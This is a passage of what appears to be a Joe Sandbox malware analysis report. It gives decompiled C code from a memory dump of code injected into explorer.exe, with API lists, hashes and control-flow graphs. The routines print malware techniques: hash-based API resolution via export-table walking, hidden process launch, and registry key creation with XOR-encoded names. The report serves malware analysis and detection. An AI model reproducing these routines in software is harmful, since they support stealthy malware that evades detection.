                                          										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
                                          									}
                                          									E000CB1B1(_t90, _t96, __eflags, _t108);
                                          								}
                                          							}
                                          							_t89 = _v12;
                                          						}
                                          						_t89 = _t89 + 1;
                                          						_v12 = _t89;
                                          						__eflags = _t89 - _v24;
                                          					} while (_t89 < _v24);
                                          					goto L15;
                                          				}
                                          				_t87 =  *0xde68c; // 0x14cfab8
                                          				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
                                          				goto L15;
                                          			}

                                          APIs
                                          • memset.MSVCRT ref: 000C61D2
                                            • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                          • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 000C622C
                                          • memset.MSVCRT ref: 000C6295
                                          • memset.MSVCRT ref: 000C62A2
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memset$AllocateHeapOpen
                                          • String ID:
                                          • API String ID: 2508404634-0
                                          • Opcode ID: a89f2d27602f936c16bf0b6f0ecb78ef43fe3f844ef85e803e973f395852986b
                                          • Instruction ID: f078e681015c4581afc2321a8b200155c778797c9d6990bad354d136111ed3bb
                                          • Opcode Fuzzy Hash: a89f2d27602f936c16bf0b6f0ecb78ef43fe3f844ef85e803e973f395852986b
                                          • Instruction Fuzzy Hash: 33510EB1A00249AFEB61DF94CC85FEE7BBCEF04740F10806AF605AB152DB759A058B65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 419 ca911-ca941 memset 420 ca94c-ca971 CreateProcessW 419->420 421 ca943-ca948 419->421 422 ca9ae 420->422 423 ca973-ca976 420->423 421->420 424 ca9b0-ca9b6 422->424 425 ca978-ca988 423->425 426 ca996-ca9a6 CloseHandle 423->426 425->426 429 ca98a-ca990 GetExitCodeProcess 425->429 427 ca9ac 426->427 427->424 429->426
                                          C-Code - Quality: 65%
                                          			E000CA911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
                                          				struct _PROCESS_INFORMATION _v20;
                                          				struct _STARTUPINFOW _v92;
                                          				signed int _t24;
                                          				intOrPtr _t32;
                                          				intOrPtr _t34;
                                          				int _t42;
                                          				WCHAR* _t44;
                                          
                                          				_t42 = 0x44;
                                          				memset( &_v92, 0, _t42);
                                          				_v92.cb = _t42;
                                          				asm("stosd");
                                          				_t44 = 1;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t24 = _a16;
                                          				if(_t24 != 0) {
                                          					_v92.dwFlags = 1;
                                          					_v92.wShowWindow = 0;
                                          				}
                                          				asm("sbb eax, eax");
                                          				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
                                          					_t44 = 0;
                                          				} else {
                                          					if(_a8 != 0) {
                                          						_push(_a12);
                                          						_t34 =  *0xde684; // 0x14cf8f0
                                          						_push(_v20.hProcess);
                                          						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
                                          							GetExitCodeProcess(_v20.hProcess, _a8);
                                          						}
                                          					}
                                          					CloseHandle(_v20.hThread);
                                          					_t32 =  *0xde684; // 0x14cf8f0
                                          					 *((intOrPtr*)(_t32 + 0x30))(_v20);
                                          				}
                                          				return _t44;
                                          			}

                                          APIs
                                          • memset.MSVCRT ref: 000CA925
                                          • CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,000CC1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 000CA96C
                                          • GetExitCodeProcess.KERNELBASE(00000000,?), ref: 000CA990
                                          • CloseHandle.KERNELBASE(?), ref: 000CA99E
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseCodeCreateExitHandlememset
                                          • String ID:
                                          • API String ID: 2668540068-0
                                          • Opcode ID: 515fd2f31e6901e20d6c51561e52fb1df9f2721549949078c0095c01d271d124
                                          • Instruction ID: ad8e7d9e7c99006ac07fdead5766fa5e04d5cfaaf349d8d5b7d3a67e274f57a9
                                          • Opcode Fuzzy Hash: 515fd2f31e6901e20d6c51561e52fb1df9f2721549949078c0095c01d271d124
                                          • Instruction Fuzzy Hash: 4F210E71A10119BFEB519FA9DC85EAE7BBCEB18784B01441AFA15D6161D634DC008B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 430 cb012-cb079 memset * 2 SHGetFolderPathW call cb946 433 cb07c-cb07e 430->433 434 cb0ab-cb0dd call cc392 lstrcpynW 433->434 435 cb080-cb094 call cbb8d 433->435 435->434 440 cb096-cb0a7 435->440 440->434
                                          C-Code - Quality: 87%
                                          			E000CB012(void* __ecx, WCHAR* __edx) {
                                          				int _v8;
                                          				void _v528;
                                          				char _v1046;
                                          				void _v1048;
                                          				intOrPtr _t21;
                                          				intOrPtr* _t26;
                                          				void* _t27;
                                          				intOrPtr _t33;
                                          				intOrPtr _t36;
                                          				void* _t39;
                                          				intOrPtr _t40;
                                          				WCHAR* _t47;
                                          				void* _t49;
                                          
                                          				_t39 = __ecx;
                                          				_v8 = 0x104;
                                          				_t47 = __edx;
                                          				memset( &_v1048, 0, 0x208);
                                          				memset( &_v528, 0, 0x208);
                                          				_t21 =  *0xde698; // 0x14cfbc8
                                          				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
                                          				_t49 = E000CB946(_t39);
                                          				_t26 =  *0xde6b8; // 0x14cfbd8
                                          				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
                                          				if(_t27 == 0) {
                                          					_t33 =  *0xde688; // 0xf0000
                                          					if(E000CBB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
                                          						_t36 =  *0xde698; // 0x14cfbc8
                                          						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
                                          					}
                                          				}
                                          				_t40 =  *0xde684; // 0x14cf8f0
                                          				 *((intOrPtr*)(_t40 + 0x30))(_t49);
                                          				lstrcpynW(_t47,  &_v1046 + E000CC392( &_v528) * 2, 0x104);
                                          				return 1;
                                          			}

                                          APIs
                                          • memset.MSVCRT ref: 000CB037
                                          • memset.MSVCRT ref: 000CB045
                                          • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 000CB05F
                                            • Part of subcall function 000CB946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,000CBA7C,74EC17D9,10000000), ref: 000CB959
                                            • Part of subcall function 000CB946: GetLastError.KERNEL32(?,?,000CBA7C,74EC17D9,10000000), ref: 000CB967
                                            • Part of subcall function 000CB946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,000CBA7C,74EC17D9,10000000), ref: 000CB980
                                          • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 000CB0D0
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
                                          • String ID:
                                          • API String ID: 3158470084-0
                                          • Opcode ID: cf666d5b425dfdb882d85405df432cbf1151db4e83984f2af2481bad33d39ac9
                                          • Instruction ID: 51dd89181f6f65cfcdbed33b84d5b23baa4a46682fef0b4f5f6547b1bf5b27aa
                                          • Opcode Fuzzy Hash: cf666d5b425dfdb882d85405df432cbf1151db4e83984f2af2481bad33d39ac9
                                          • Instruction Fuzzy Hash: 8C2196B1501218AFE710EB94DCC5EDB37BCEB58354F1040A5F605D7192D7749E458B70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 442 cbf37-cbf66 RegOpenKeyExW 443 cbf6c-cbf8a RegQueryValueExW 442->443 444 cbf68-cbf6a 442->444 446 cbf8c-cbf9c call c8604 443->446 447 cbfc7-cbfca 443->447 445 cbfda-cbfdc 444->445 446->447 453 cbf9e-cbfb8 RegQueryValueExW 446->453 448 cbfcc-cbfd1 447->448 449 cbfd7 447->449 448->449 451 cbfd9 449->451 451->445 454 cbfdd-cbfea RegCloseKey 453->454 455 cbfba-cbfc6 call c861a 453->455 454->451 455->447
                                          C-Code - Quality: 100%
                                          			E000CBF37(short* __edx, short* _a4) {
                                          				void* _v8;
                                          				int _v12;
                                          				int _v16;
                                          				char* _v20;
                                          				char* _t30;
                                          				intOrPtr _t31;
                                          				char* _t49;
                                          
                                          				_v16 = 0;
                                          				_v12 = 0;
                                          				_v8 = 0;
                                          				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
                                          					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
                                          						L6:
                                          						if(_v8 != 0) {
                                          							_t31 =  *0xde68c; // 0x14cfab8
                                          							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
                                          						}
                                          						_t30 = 0;
                                          						L9:
                                          						return _t30;
                                          					}
                                          					_t49 = E000C8604(_v12);
                                          					_v20 = _t49;
                                          					if(_t49 == 0) {
                                          						goto L6;
                                          					}
                                          					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
                                          						RegCloseKey(_v8);
                                          						_t30 = _t49;
                                          						goto L9;
                                          					}
                                          					E000C861A( &_v20, 0xfffffffe);
                                          					goto L6;
                                          				}
                                          				return 0;
                                          			}

                                          APIs
                                          • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,000C2C08,00000000), ref: 000CBF5E
                                          • RegQueryValueExW.KERNEL32(00000000,000C2C08,00000000,?,00000000,000C2C08,00000000,?,?,000C2C08,00000000), ref: 000CBF82
                                          • RegQueryValueExW.KERNEL32(00000000,000C2C08,00000000,00000000,00000000,000C2C08,?,?,000C2C08,00000000), ref: 000CBFB0
                                          • RegCloseKey.KERNEL32(00000000,?,?,000C2C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 000CBFE5
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: QueryValue$CloseOpen
                                          • String ID:
                                          • API String ID: 1586453840-0
                                          • Opcode ID: a7851e54e30f56c8d416c1b864b217d5c59bf41e52df84a7b71d9aa404f3ba7d
                                          • Instruction ID: 5287311d19161c5311007a090eb7e9ccf09f1a8ec080f3f080957cd4843ff4b4
                                          • Opcode Fuzzy Hash: a7851e54e30f56c8d416c1b864b217d5c59bf41e52df84a7b71d9aa404f3ba7d
                                          • Instruction Fuzzy Hash: 9E210976900118FFDB10DFA5DC45E9EBBF8EF54740F1141AAB905E6261D7309A01DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 458 cbe9b-cbec3 RegOpenKeyExA 459 cbec9-cbee6 RegQueryValueExA 458->459 460 cbec5-cbec7 458->460 462 cbee8-cbef7 call c8604 459->462 463 cbf21-cbf24 459->463 461 cbf33-cbf36 460->461 462->463 468 cbef9-cbf13 RegQueryValueExA 462->468 465 cbf26-cbf2e RegCloseKey 463->465 466 cbf31 463->466 465->466 466->461 468->463 469 cbf15-cbf1a 468->469 469->463 470 cbf1c-cbf1f 469->470 470->463
                                          C-Code - Quality: 100%
                                          			E000CBE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
                                          				void* _v8;
                                          				int _v12;
                                          				int _v16;
                                          				intOrPtr* _t43;
                                          				char* _t46;
                                          
                                          				_t46 = 0;
                                          				_v8 = 0;
                                          				_v16 = 0;
                                          				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
                                          					return 0;
                                          				}
                                          				_v12 = 0;
                                          				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
                                          					_t46 = E000C8604(_v12 + 1);
                                          					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
                                          						_t43 = _a12;
                                          						if(_t43 != 0) {
                                          							 *_t43 = _v12;
                                          						}
                                          					}
                                          				}
                                          				if(_v8 != 0) {
                                          					RegCloseKey(_v8);
                                          				}
                                          				return _t46;
                                          			}

                                          APIs
                                          • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,014CFC08,00000000,?,00000002), ref: 000CBEBE
                                          • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 000CBEE1
                                          • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 000CBF0E
                                          • RegCloseKey.KERNEL32(?,?,00000002), ref: 000CBF2E
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: QueryValue$CloseOpen
                                          • String ID:
                                          • API String ID: 1586453840-0
                                          • Opcode ID: 727feee892f3c20d591ff2dcb9cd7998d04f9d974b5bd6cd0de492d6c76b7d70
                                          • Instruction ID: 0a60d65e2cdd778546922eb2bef94615bab3b931e93d59a9e41fb967d6fdba14
                                          • Opcode Fuzzy Hash: 727feee892f3c20d591ff2dcb9cd7998d04f9d974b5bd6cd0de492d6c76b7d70
                                          • Instruction Fuzzy Hash: 7221EAB5A01148BF9B60DFA9DC85EAEBBF8EF84740B0141AAB901D7220D730DA01DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 471 cdfad-cdfc4 472 cdfc6-cdfee 471->472 473 ce021 471->473 472->473 474 cdff0-ce013 call cc379 call cd400 472->474 475 ce023-ce027 473->475 480 ce028-ce03f 474->480 481 ce015-ce01f 474->481 482 ce095-ce097 480->482 483 ce041-ce049 480->483 481->473 481->474 482->475 483->482 484 ce04b 483->484 485 ce04d-ce053 484->485 486 ce055-ce057 485->486 487 ce063-ce074 485->487 486->487 490 ce059-ce061 486->490 488 ce079-ce085 LoadLibraryA 487->488 489 ce076-ce077 487->489 488->473 491 ce087-ce091 GetProcAddress 488->491 489->488 490->485 490->487 491->473 492 ce093 491->492 492->475
                                          C-Code - Quality: 100%
                                          			E000CDFAD(void* __ecx, intOrPtr __edx) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				char _v92;
                                          				intOrPtr _t41;
                                          				signed int _t47;
                                          				signed int _t49;
                                          				signed int _t51;
                                          				void* _t56;
                                          				struct HINSTANCE__* _t58;
                                          				_Unknown_base(*)()* _t59;
                                          				intOrPtr _t60;
                                          				void* _t62;
                                          				intOrPtr _t63;
                                          				void* _t69;
                                          				char _t70;
                                          				void* _t75;
                                          				CHAR* _t80;
                                          				void* _t82;
                                          
                                          				_t75 = __ecx;
                                          				_v12 = __edx;
                                          				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                          				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                          				if(_t41 == 0) {
                                          					L4:
                                          					return 0;
                                          				}
                                          				_t62 = _t41 + __ecx;
                                          				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                          				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                          				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                          				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                          				_t47 = 0;
                                          				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                          				_v8 = 0;
                                          				_v16 = _t63;
                                          				if(_t63 == 0) {
                                          					goto L4;
                                          				} else {
                                          					goto L2;
                                          				}
                                          				while(1) {
                                          					L2:
                                          					_t49 = E000CD400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E000CC379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                          					_t51 = _v8;
                                          					if((_t49 ^ 0x218fe95b) == _v12) {
                                          						break;
                                          					}
                                          					_t73 = _v20;
                                          					_t47 = _t51 + 1;
                                          					_v8 = _t47;
                                          					if(_t47 < _v16) {
                                          						continue;
                                          					}
                                          					goto L4;
                                          				}
                                          				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                          				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                          				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                          					return _t80;
                                          				} else {
                                          					_t56 = 0;
                                          					while(1) {
                                          						_t70 = _t80[_t56];
                                          						if(_t70 == 0x2e || _t70 == 0) {
                                          							break;
                                          						}
                                          						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                          						_t56 = _t56 + 1;
                                          						if(_t56 < 0x40) {
                                          							continue;
                                          						}
                                          						break;
                                          					}
                                          					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                          					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                          					if( *((char*)(_t56 + _t80)) != 0) {
                                          						_t80 =  &(( &(_t80[1]))[_t56]);
                                          					}
                                          					_t40 =  &_v92; // 0x6c6c642e
                                          					_t58 = LoadLibraryA(_t40); // executed
                                          					if(_t58 == 0) {
                                          						goto L4;
                                          					}
                                          					_t59 = GetProcAddress(_t58, _t80);
                                          					if(_t59 == 0) {
                                          						goto L4;
                                          					}
                                          					return _t59;
                                          				}
                                          			}

                                          APIs
                                          • LoadLibraryA.KERNEL32(.dll), ref: 000CE07D
                                          • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 000CE089
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: .dll
                                          • API String ID: 2574300362-2738580789
                                          • Opcode ID: 73480dcf04640b5668e538ebe0794b7acac3a1320454cbe5ad927de6f1f71708
                                          • Instruction ID: 5f9d211447d3819fd503f87bdcf7e534d45c92374d2040a9589af20f045a33b0
                                          • Opcode Fuzzy Hash: 73480dcf04640b5668e538ebe0794b7acac3a1320454cbe5ad927de6f1f71708
                                          • Instruction Fuzzy Hash: 6D31B231A001959BDB64CFA9C884BAEBBE5AF44304F38446ED905D7352DA74ED81CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph: function E000C9B43 (legend: Executed / Not Executed)
                                          C-Code - Quality: 89%
                                          			E000C9B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
                                          				void* _v8;
                                          				int _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				int _v24;
                                          				void* _v28;
                                          				char _v32;
                                          				char _v36;
                                          				int* _v40;
                                          				int** _v44;
                                          				void _v108;
                                          				int* _t90;
                                          				void* _t91;
                                          				char* _t92;
                                          				long _t96;
                                          				int* _t97;
                                          				intOrPtr _t98;
                                          				int* _t101;
                                          				long _t111;
                                          				int* _t112;
                                          				intOrPtr _t122;
                                          				char* _t125;
                                          				intOrPtr _t126;
                                          				intOrPtr _t128;
                                          				int* _t129;
                                          				intOrPtr _t131;
                                          				int* _t133;
                                          				intOrPtr _t134;
                                          				int* _t135;
                                          				intOrPtr _t136;
                                          				char* _t139;
                                          				int _t143;
                                          				int _t147;
                                          				intOrPtr _t148;
                                          				int* _t149;
                                          				int* _t154;
                                          				int** _t155;
                                          				int* _t161;
                                          				int* _t163;
                                          				intOrPtr _t164;
                                          				intOrPtr _t171;
                                          				int _t176;
                                          				char* _t177;
                                          				char* _t178;
                                          				char _t179;
                                          				void* _t180;
                                          				void* _t181;
                                          				void* _t183;
                                          
                                          				_t176 = 0;
                                          				_v24 = __edx;
                                          				_t177 = 0;
                                          				_v32 = __ecx;
                                          				_v28 = 0;
                                          				_v8 = 0x80000001;
                                          				_v20 = 0;
                                          				_t155 = E000C8604(0x110);
                                          				_v44 = _t155;
                                          				if(_t155 != 0) {
                                          					_t158 = _a4;
                                          					_t155[0x42] = _a4;
                                          					E000CB5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
                                          					_t161 = _v108;
                                          					__eflags = _t161 - 0x61 - 0x19;
                                          					_t90 = _t161;
                                          					if(_t161 - 0x61 <= 0x19) {
                                          						_t90 = _t90 - 0x20;
                                          						__eflags = _t90;
                                          					}
                                          					_v108 = _t90;
                                          					_t91 = E000C95C7(0x4d2);
                                          					_t163 = _v24;
                                          					_v16 = _t91;
                                          					__eflags = _t163;
                                          					if(_t163 == 0) {
                                          						L16:
                                          						_t164 =  *0xde688; // 0xf0000
                                          						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
                                          						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
                                          							_push(_t176);
                                          							_push( &_v108);
                                          							_push("\\");
                                          							_t92 = E000C9292(_t91);
                                          							_t181 = _t181 + 0x10;
                                          							L20:
                                          							_t177 = _t92;
                                          							_v20 = _t177;
                                          							goto L21;
                                          						}
                                          						_v24 = _t176;
                                          						_v8 = 0x80000003;
                                          						_t122 =  *0xde68c; // 0x14cfab8
                                          						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
                                          						__eflags = _v24 - _t177;
                                          						if(_v24 == _t177) {
                                          							goto L21;
                                          						}
                                          						_push(_t176);
                                          						_push( &_v108);
                                          						_t125 = "\\";
                                          						_push(_t125);
                                          						_push(_v16);
                                          						_push(_t125);
                                          						_t92 = E000C9292(_v24);
                                          						_t181 = _t181 + 0x18;
                                          						goto L20;
                                          					} else {
                                          						_t126 =  *0xde688; // 0xf0000
                                          						_t128 =  *0xde68c; // 0x14cfab8
                                          						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
                                          						__eflags = _t129;
                                          						if(_t129 != 0) {
                                          							_t91 = _v16;
                                          							goto L16;
                                          						}
                                          						_v12 = _t176;
                                          						_t131 =  *0xde68c; // 0x14cfab8
                                          						_v8 = 0x80000003;
                                          						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
                                          						__eflags = _v12 - _t177;
                                          						if(_v12 == _t177) {
                                          							L21:
                                          							E000C85C2( &_v16);
                                          							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
                                          							__eflags = _t96;
                                          							if(_t96 == 0) {
                                          								_t97 = _a8;
                                          								__eflags = _t97;
                                          								if(_t97 != 0) {
                                          									 *_t97 = 1;
                                          								}
                                          								_push(_v28);
                                          								L30:
                                          								_t98 =  *0xde68c; // 0x14cfab8
                                          								 *((intOrPtr*)(_t98 + 0x1c))();
                                          								_t155[0x43] = _v8;
                                          								_t101 = E000CC379(_t177);
                                          								 *_t155 = _t101;
                                          								__eflags = _t101;
                                          								if(_t101 == 0) {
                                          									L32:
                                          									E000C861A( &_v20, 0xffffffff);
                                          									return _t155;
                                          								} else {
                                          									goto L31;
                                          								}
                                          								do {
                                          									L31:
                                          									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
                                          									_t176 = _t176 + 1;
                                          									__eflags = _t176 -  *_t155;
                                          								} while (_t176 <  *_t155);
                                          								goto L32;
                                          							}
                                          							_v16 = _t176;
                                          							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
                                          							__eflags = _t111;
                                          							if(_t111 == 0) {
                                          								_t112 = _a8;
                                          								__eflags = _t112;
                                          								if(_t112 != 0) {
                                          									 *_t112 = _t176;
                                          								}
                                          								_push(_v16);
                                          								goto L30;
                                          							}
                                          							L23:
                                          							E000C861A( &_v44, 0x110);
                                          							memset( &_v108, _t176, 0x40);
                                          							E000C861A( &_v20, 0xffffffff);
                                          							goto L1;
                                          						}
                                          						_push(_t176);
                                          						_push(_v16);
                                          						_t178 = "\\";
                                          						_push(_t178);
                                          						_t133 = E000C9292(_v12);
                                          						_t181 = _t181 + 0x10;
                                          						_v40 = _t133;
                                          						__eflags = _t133;
                                          						if(_t133 == 0) {
                                          							goto L23;
                                          						}
                                          						_t134 =  *0xde68c; // 0x14cfab8
                                          						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
                                          						__eflags = _t135;
                                          						if(_t135 == 0) {
                                          							_t136 =  *0xde68c; // 0x14cfab8
                                          							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
                                          						} else {
                                          							_t143 = E000C95E1( &_v36, 0x34);
                                          							_v24 = _t143;
                                          							_t179 = E000C92E5(_v32);
                                          							_v32 = _t179;
                                          							E000C85D5( &_v24);
                                          							_t183 = _t181 + 0x18;
                                          							_t147 = E000C9256(_v12);
                                          							_v24 = _t147;
                                          							_t148 =  *0xde68c; // 0x14cfab8
                                          							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
                                          							__eflags = _t149;
                                          							if(_t149 == 0) {
                                          								_t154 = _a12;
                                          								__eflags = _t154;
                                          								if(_t154 != 0) {
                                          									 *_t154 = 1;
                                          								}
                                          							}
                                          							E000C861A( &_v32, 0xfffffffe);
                                          							E000C861A( &_v24, 0xfffffffe);
                                          							_t181 = _t183 + 0x10;
                                          							_t178 = "\\";
                                          						}
                                          						_t139 = E000C9292(_v12);
                                          						_t171 =  *0xde684; // 0x14cf8f0
                                          						_t181 = _t181 + 0x18;
                                          						_t177 = _t139;
                                          						_v20 = _t177;
                                          						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
                                          						E000C861A( &_v40, 0xffffffff);
                                          						goto L21;
                                          					}
                                          				}
                                          				L1:
                                          				return 0;
                                          			}

                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: dbe772954fbdf0f7346addee2f82cb35bc63da3f279e120720e911b77a959b0f
                                          • Instruction ID: d99cd1c3d9fcc3767b0c57ffbf3441cc8e1f37364192496a450fb361744b74f1
                                          • Opcode Fuzzy Hash: dbe772954fbdf0f7346addee2f82cb35bc63da3f279e120720e911b77a959b0f
                                          • Instruction Fuzzy Hash: FB913CB1D00209AFDF10DF95CC89EEEBBB8EF18350F10416AF915AB292D7349A00CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph: function E000CB998 (legend: Executed / Not Executed)
                                          C-Code - Quality: 86%
                                          			E000CB998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				void* _t12;
                                          				void* _t20;
                                          				void* _t22;
                                          				union _TOKEN_INFORMATION_CLASS _t28;
                                          				void* _t31;
                                          
                                          				_push(_t22);
                                          				_push(_t22);
                                          				_t31 = 0;
                                          				_t28 = __edx;
                                          				_t20 = _t22;
                                          				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                          					L6:
                                          					_t12 = _t31;
                                          				} else {
                                          					_t31 = E000C8604(_v8);
                                          					_v12 = _t31;
                                          					if(_t31 != 0) {
                                          						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                          							goto L6;
                                          						} else {
                                          							E000C861A( &_v12, _t16);
                                          							goto L3;
                                          						}
                                          					} else {
                                          						L3:
                                          						_t12 = 0;
                                          					}
                                          				}
                                          				return _t12;
                                          			}

                                          APIs
                                          • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9B3
                                          • GetLastError.KERNEL32(?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9BA
                                            • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
